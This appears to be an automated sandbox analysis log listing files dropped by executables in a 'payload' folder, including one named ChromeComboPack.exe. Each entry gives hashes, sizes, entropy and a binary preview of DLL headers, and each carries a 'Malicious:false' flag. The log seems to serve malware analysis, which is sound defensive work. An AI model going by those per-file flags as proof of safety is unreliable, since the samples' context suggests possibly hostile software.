                                                                                                                                                                                                                                            SSDEEP:12288:FrEHdcM6hb/CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAa1:FrEXaCjfk7bPNfv42BN6yzUAa1
                                                                                                                                                                                                                                            MD5:B848E259FABAF32B4B3C980A0A12488D
                                                                                                                                                                                                                                            SHA1:DA2E864E18521C86C7D8968DB74BB2B28E4C23E2
                                                                                                                                                                                                                                            SHA-256:C65073B65F107E471C9BE3C699FB11F774E9A07581F41229582F7B2154B6FC3C
                                                                                                                                                                                                                                            SHA-512:4C6953504D1401FE0C74435BCEEBC5EC7BF8991FD42B659867A3529CEE5CC64DA54F1AB404E88160E747887A7409098F1A85A546BC40F12F0DDE0025408F9E27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.@..........0*.......................................p......]M....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):146712
                                                                                                                                                                                                                                            Entropy (8bit):6.609302620823316
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:7qLKjJj3yg1shVjm4OvfqnKAh2mrohmR5JHDbuNy:7qGEgSefI3roCDbV
                                                                                                                                                                                                                                            MD5:4FADEDA3C1DA95337B67D15C282D49D8
                                                                                                                                                                                                                                            SHA1:F49EE3256F8F5746515194114F7EF73D6B6141C0
                                                                                                                                                                                                                                            SHA-256:28484BCEA1E387C4A41564AF8F62C040FE203FE2491E415CE90F3D7F5C7AB013
                                                                                                                                                                                                                                            SHA-512:45634CAF9D9214F0E45E11A1539D8663B45527E1AE9282558B5FDB8465D90B0FABCF4C0E508504427A597BA390C029BC12068AC17D842FD0FCBB1886D252C6B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x.Oc..........."...'............P..........A.....................................W....`... ......................................@.......P..8......................../......................................(....................Q..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata....... ......................@..@.bss.........0...........................edata.......@......................@..@.idata..8....P......................@....CRT....X....`......................@....tls.........p......................@....rsrc...............................@....reloc..............................@..B................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                                                            Entropy (8bit):4.703513333396807
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                                                                                                                                                                                                            MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                                                                                                                                                                                                            SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                                                                                                                                                                                                            SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                                                                                                                                                                                                            SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                                            Entropy (8bit):4.968452734961967
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
                                                                                                                                                                                                                                            MD5:371776A7E26BAEB3F75C93A8364C9AE0
                                                                                                                                                                                                                                            SHA1:BF60B2177171BA1C6B4351E6178529D4B082BDA9
                                                                                                                                                                                                                                            SHA-256:15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
                                                                                                                                                                                                                                            SHA-512:C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.061461040216793
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                                                                                                                                                                                                            MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                                                                                                                                                                                                            SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                                                                                                                                                                                                            SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                                                                                                                                                                                                            SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.236167046748013
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
                                                                                                                                                                                                                                            MD5:D9E7218460AEE693BEA07DA7C2B40177
                                                                                                                                                                                                                                            SHA1:9264D749748D8C98D35B27BEFE6247DA23FF103D
                                                                                                                                                                                                                                            SHA-256:38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
                                                                                                                                                                                                                                            SHA-512:DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36352
                                                                                                                                                                                                                                            Entropy (8bit):6.558176937399355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
                                                                                                                                                                                                                                            MD5:F751792DF10CDEED391D361E82DAF596
                                                                                                                                                                                                                                            SHA1:3440738AF3C88A4255506B55A673398838B4CEAC
                                                                                                                                                                                                                                            SHA-256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
                                                                                                                                                                                                                                            SHA-512:6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15872
                                                                                                                                                                                                                                            Entropy (8bit):5.285191078037458
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
                                                                                                                                                                                                                                            MD5:BBEA5FFAE18BF0B5679D5C5BCD762D5A
                                                                                                                                                                                                                                            SHA1:D7C2721795113370377A1C60E5CEF393473F0CC5
                                                                                                                                                                                                                                            SHA-256:1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
                                                                                                                                                                                                                                            SHA-512:0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d....e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                                            Entropy (8bit):5.505471888568532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
                                                                                                                                                                                                                                            MD5:D2175300E065347D13211F5BF7581602
                                                                                                                                                                                                                                            SHA1:3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
                                                                                                                                                                                                                                            SHA-256:94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
                                                                                                                                                                                                                                            SHA-512:6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20992
                                                                                                                                                                                                                                            Entropy (8bit):6.06124024160806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
                                                                                                                                                                                                                                            MD5:45616B10ABE82D5BB18B9C3AB446E113
                                                                                                                                                                                                                                            SHA1:91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
                                                                                                                                                                                                                                            SHA-256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
                                                                                                                                                                                                                                            SHA-512:ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):25088
                                                                                                                                                                                                                                            Entropy (8bit):6.475467273446457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
                                                                                                                                                                                                                                            MD5:CF3C2F35C37AA066FA06113839C8A857
                                                                                                                                                                                                                                            SHA1:39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
                                                                                                                                                                                                                                            SHA-256:1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
                                                                                                                                                                                                                                            SHA-512:1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                                            Entropy (8bit):4.838534302892255
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0F/1nb2mhQtkr+juOxKbDbnHcqgYvEkrK:u2f6iuOsbDtgYvEmK
                                                                                                                                                                                                                                            MD5:20708935FDD89B3EDDEEA27D4D0EA52A
                                                                                                                                                                                                                                            SHA1:85A9FE2C7C5D97FD02B47327E431D88A1DC865F7
                                                                                                                                                                                                                                            SHA-256:11DD1B49F70DB23617E84E08E709D4A9C86759D911A24EBDDFB91C414CC7F375
                                                                                                                                                                                                                                            SHA-512:F28C31B425DC38B5E9AD87B95E8071997E4A6F444608E57867016178CD0CA3E9F73A4B7F2A0A704E45F75B7DCFF54490510C6BF8461F3261F676E9294506D09B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):4.9047185025862925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:NRgPX8lvI+KnwSDTPUDEhKWPXcqgzQkvEd:2og9rUD9mpgzQkvE
                                                                                                                                                                                                                                            MD5:43BBE5D04460BD5847000804234321A6
                                                                                                                                                                                                                                            SHA1:3CAE8C4982BBD73AF26EB8C6413671425828DBB7
                                                                                                                                                                                                                                            SHA-256:FAA41385D0DB8D4EE2EE74EE540BC879CF2E884BEE87655FF3C89C8C517EED45
                                                                                                                                                                                                                                            SHA-512:DBC60F1D11D63BEBBAB3C742FB827EFBDE6DFF3C563AE1703892D5643D5906751DB3815B97CBFB7DA5FCD306017E4A1CDCC0CDD0E61ADF20E0816F9C88FE2C9B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                                                            Entropy (8bit):5.300163691206422
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:j0J1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDrdkrRcqgUF6+6vEX:jM01si8XSi3SACqe7tDeDgUUjvE
                                                                                                                                                                                                                                            MD5:C6B20332B4814799E643BADFFD8DF2CD
                                                                                                                                                                                                                                            SHA1:E7DA1C1F09F6EC9A84AF0AB0616AFEA55A58E984
                                                                                                                                                                                                                                            SHA-256:61C7A532E108F67874EF2E17244358DF19158F6142680F5B21032BA4889AC5D8
                                                                                                                                                                                                                                            SHA-512:D50C7F67D2DFB268AD4CF18E16159604B6E8A50EA4F0C9137E26619FD7835FAAD323B5F6A2B8E3EC1C023E0678BCBE5D0F867CD711C5CD405BD207212228B2B4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..*B..*B..*B..R...*B..UC..*B.RC..*B..*C..*B..UG..*B..UF..*B..UA..*B..J..*B..B..*B....*B..@..*B.Rich.*B.........................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):57856
                                                                                                                                                                                                                                            Entropy (8bit):4.260220483695234
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:9XUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZNZY0JAIg+v:99HGHfJidSK
                                                                                                                                                                                                                                            MD5:0B538205388FDD99A043EE3AFAA074E4
                                                                                                                                                                                                                                            SHA1:E0DD9306F1DBE78F7F45A94834783E7E886EB70F
                                                                                                                                                                                                                                            SHA-256:C4769D3E6EB2A2FECB5DEC602D45D3E785C63BB96297268E3ED069CC4A019B1A
                                                                                                                                                                                                                                            SHA-512:2F4109E42DB7BC72EB50BCCC21EB200095312EA00763A255A38A4E35A77C04607E1DB7BB69A11E1D80532767B20BAA4860C05F52F32BF1C81FE61A7ECCEB35ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):58368
                                                                                                                                                                                                                                            Entropy (8bit):4.276870967324261
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:9jUqho9weF5/eHkRnYcZiGKdZHDL7idErZjZYXGg:9RCneH//id42
                                                                                                                                                                                                                                            MD5:6C3E976AB9F47825A5BD9F73E8DBA74E
                                                                                                                                                                                                                                            SHA1:4C6EB447FE8F195CF7F4B594CE7EAF928F52B23A
                                                                                                                                                                                                                                            SHA-256:238CDB6B8FB611DB4626E6D202E125E2C174C8F73AE8A3273B45A0FC18DEA70C
                                                                                                                                                                                                                                            SHA-512:B19516F00CC0484D9CDA82A482BBFE41635CDBBE19C13F1E63F033C9A68DD36798C44F04D6BD8BAE6523A845E852D81ACADD0D5DD86AF62CC9D081B803F8DF7B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                                                            Entropy (8bit):4.578113904149635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:R0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwo2Pj15XkcX6gbW6z:DVddiT7pgTctEEI4qXDo11kcqgbW6
                                                                                                                                                                                                                                            MD5:FEE13D4FB947835DBB62ACA7EAFF44EF
                                                                                                                                                                                                                                            SHA1:7CC088AB68F90C563D1FE22D5E3C3F9E414EFC04
                                                                                                                                                                                                                                            SHA-256:3E0D07BBF93E0748B42B1C2550F48F0D81597486038C22548224584AE178A543
                                                                                                                                                                                                                                            SHA-512:DEA92F935BC710DF6866E89CC6EB5B53FC7ADF0F14F3D381B89D7869590A1B0B1F98F347664F7A19C6078E7AA3EB0F773FFCB711CC4275D0ECD54030D6CF5CB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                                                            Entropy (8bit):6.143719741413071
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:IUv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Q90gYP2lXCM:BKR8I+K0lDFQgLa17zU
                                                                                                                                                                                                                                            MD5:76F88D89643B0E622263AF676A65A8B4
                                                                                                                                                                                                                                            SHA1:93A365060E98890E06D5C2D61EFBAD12F5D02E06
                                                                                                                                                                                                                                            SHA-256:605C86145B3018A5E751C6D61FD0F85CF4A9EBF2AD1F3009A4E68CF9F1A63E49
                                                                                                                                                                                                                                            SHA-512:979B97AAC01633C46C048010FA886EBB09CFDB5520E415F698616987AE850FD342A4210A8DC0FAC1E059599F253565862892171403F5E4F83754D02D2EF3F366
                                                                                                                                                                                                                                            Malicious:false
